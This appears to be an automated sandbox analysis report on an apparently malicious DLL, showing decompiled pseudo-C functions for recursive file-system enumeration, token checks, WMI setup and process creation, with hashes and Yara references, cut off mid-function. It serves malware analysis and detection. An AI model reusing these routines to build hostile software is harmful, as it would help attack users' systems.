memset.MSVCRT ref: 1000AE85
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateProcessmemset
String ID:
API String ID: 2296119082-0
Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161

Uniqueness

Uniqueness Score: -1.00%

Function 1000E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085C2( &_v8);
				return _t25;
			}

0x1000e1bf
0x1000e1c2
0x1000e1c8
0x1000e1ca
0x1000e1cf
0x1000e1d1
0x1000e1db
0x1000e1dc
0x1000e1eb
0x1000e1de
0x1000e1de
0x1000e1de
0x1000e1ef
0x1000e1f6
0x1000e1fc
0x1000e1fc
0x1000e201
0x1000e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}

0x1000ccc6
0x1000ccc9
0x1000ccce
0x1000ccd1
0x1000ccd3
0x1000ccd3
0x1000ccd3
0x1000ccd6
0x1000ccd8
0x1000ccdf
0x1000cce7
0x1000ccea
0x1000ccf4
0x1000ccfa
0x1000ccfa
0x1000ccff
0x00000000
0x00000000
0x1000cd04
0x1000cd05
0x1000cd0c
0x00000000
0x00000000
0x1000cd0e
0x00000000
0x1000cd0c
0x1000cd13
0x1000cd13
0x1000cd15
0x1000cd15
0x1000cd16
0x1000cd19
0x1000cd19
0x1000cd1e
0x1000cd26
0x1000cd32

APIs

lstrcmpi.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x8abfaa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}

0x10005e96
0x10005ea3
0x10005ead

APIs

ExitProcess.KERNEL32(00000000), ref: 10005EAD

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11

Uniqueness

Uniqueness Score: -1.00%

Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}

0x100085f8
0x100085fe
0x10008603

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA62, Relevance: 1.3, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000BA62(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000B946(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000B998(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						CloseHandle(_v16);
						if(_t48 != 0) {
							E1000861A( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x1001e68c; // 0x8abfc68
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x1001e68c; // 0x8abfc68
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x1001e68c; // 0x8abfc68
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x1000ba69
0x1000ba6b
0x1000ba72
0x1000ba74
0x1000ba77
0x1000ba7c
0x1000ba81
0x1000ba8b
0x1000ba8e
0x1000ba91
0x1000ba96
0x1000ba98
0x1000ba9e
0x1000bafe
0x1000bb06
0x1000bb0c
0x1000bb13
0x1000bb19
0x00000000
0x1000bb1a
0x1000baa3
0x1000baa4
0x1000baa5
0x1000baa6
0x1000baa7
0x1000baa8
0x1000baa9
0x1000baaa
0x1000baaf
0x1000bab1
0x1000bab6
0x1000bab7
0x1000bac1
0x00000000
0x00000000
0x1000bac5
0x1000baf1
0x1000baf1
0x1000baf9
0x1000bafc
0x00000000
0x1000bafc
0x1000bac7
0x1000bac7
0x1000baca
0x1000bacd
0x1000bacd
0x1000bad0
0x1000bad2
0x1000badc
0x00000000
0x00000000
0x1000bae1
0x1000bae2
0x1000bae5
0x1000baea
0x00000000
0x00000000
0x00000000
0x1000baec
0x1000baf0
0x00000000
0x1000baf0
0x1000bb1f

APIs

Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980

Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentErrorLast$CloseHandleInformationProcessThreadToken
String ID:
API String ID: 3752664914-0
Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x1000d530
0x1000d533
0x1000d536
0x1000d547
0x1000d54d
0x1000d55e
0x1000d566
0x1000d5b7
0x1000d5b7
0x1000d5bc
0x1000d5c1
0x1000d5c1
0x1000d5c4
0x1000d5c9
0x1000d5ce
0x1000d5ce
0x1000d5d1
0x1000d568
0x1000d569
0x1000d56f
0x1000d580
0x1000d585
0x00000000
0x1000d587
0x1000d594
0x1000d59c
0x00000000
0x1000d59e
0x1000d5a0
0x1000d5a8
0x00000000
0x1000d5aa
0x1000d5ad
0x1000d5b3
0x1000d5b3
0x1000d5a8
0x1000d59c
0x1000d585
0x1000d5d6

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
SysAllocString.OLEAUT32(00000000), ref: 1000D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 2855449287-0
Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30

Uniqueness

Uniqueness Score: -1.00%

Function 1000AEB4, Relevance: 3.1, APIs: 2, Instructions: 113
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				short _v560;
				short _v562;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t27;
				void* _t31;
				int _t36;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t56;
				void* _t61;
				char _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t80;

				_t80 = __fp0;
				_push(0);
				_t51 = __ecx;
				_push(L"\\*");
				_t27 = E100092E5(__ecx);
				_t65 = _t64 + 0xc;
				_v16 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t61 = FindFirstFileW(_t27,  &_v608);
				if(_t61 == 0xffffffff) {
					L18:
					return E1000861A( &_v16, 0xfffffffe);
				}
				_t31 = 0x2e;
				do {
					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
						if((_v608.dwFileAttributes & 0x00000010) != 0) {
							L14:
							_push(0);
							_push( &(_v608.cFileName));
							_push("\\");
							_t62 = E100092E5(_t51);
							_t65 = _t65 + 0x10;
							_v12 = _t62;
							if(_t62 != 0) {
								_t56 =  *0x1001e684; // 0x8abfaa0
								 *((intOrPtr*)(_t56 + 0xb4))(1);
								_push(1);
								_push(1);
								_push(0);
								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
								_t65 = _t65 + 0x1c;
								E1000861A( &_v12, 0xfffffffe);
							}
							goto L16;
						}
						_t63 = 0;
						do {
							_t10 = _t63 + 0x1001e78c; // 0x0
							_push( *_t10);
							_push( &(_v608.cFileName));
							_t44 =  *0x1001e690; // 0x8abfd40
							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
								goto L12;
							}
							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
							_t65 = _t65 + 0xc;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *0x1001e684; // 0x8abfaa0
							 *((intOrPtr*)(_t49 + 0xb4))(1);
							L12:
							_t63 = _t63 + 4;
						} while (_t63 < 4);
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L16;
						}
						goto L14;
					}
					L16:
					_t36 = FindNextFileW(_t61,  &_v608);
					_t31 = 0x2e;
				} while (_t36 != 0);
				_t37 =  *0x1001e684; // 0x8abfaa0
				 *((intOrPtr*)(_t37 + 0x78))(_t61);
				goto L18;
			}

0x1000aeb4
0x1000aec0
0x1000aec2
0x1000aec4
0x1000aeca
0x1000aecf
0x1000aed2
0x1000aed7
0x1000b011
0x1000b011
0x1000aeeb
0x1000aef0
0x1000b000
0x00000000
0x1000b00c
0x1000aef8
0x1000aef9
0x1000af00
0x1000af2f
0x1000af82
0x1000af82
0x1000af8a
0x1000af8b
0x1000af96
0x1000af98
0x1000af9b
0x1000afa0
0x1000afa2
0x1000afaa
0x1000afb0
0x1000afb2
0x1000afb4
0x1000afc9
0x1000afce
0x1000afd7
0x1000afdd
0x00000000
0x1000afa0
0x1000af31
0x1000af33
0x1000af33
0x1000af33
0x1000af3f
0x1000af40
0x1000af4a
0x00000000
0x00000000
0x1000af57
0x1000af5c
0x1000af61
0x00000000
0x00000000
0x1000af63
0x1000af6a
0x1000af70
0x1000af70
0x1000af73
0x1000af80
0x00000000
0x00000000
0x00000000
0x1000af80
0x1000afde
0x1000afe6
0x1000aff0
0x1000aff0
0x1000aff7
0x1000affd
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65

Uniqueness

Uniqueness Score: -1.00%

Function 1000980C, Relevance: 3.0, APIs: 2, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790

Uniqueness

Uniqueness Score: -1.00%

Function 10016EB0, Relevance: .4, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x5dc03300
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x55c35dc0
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0xfffffe8b
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x4e9
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x33000000
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0xfffffe8b
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x8b3c7e8c
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0xfffffe8b
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x238830a
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x830a74c0
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0xfffffe8b
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
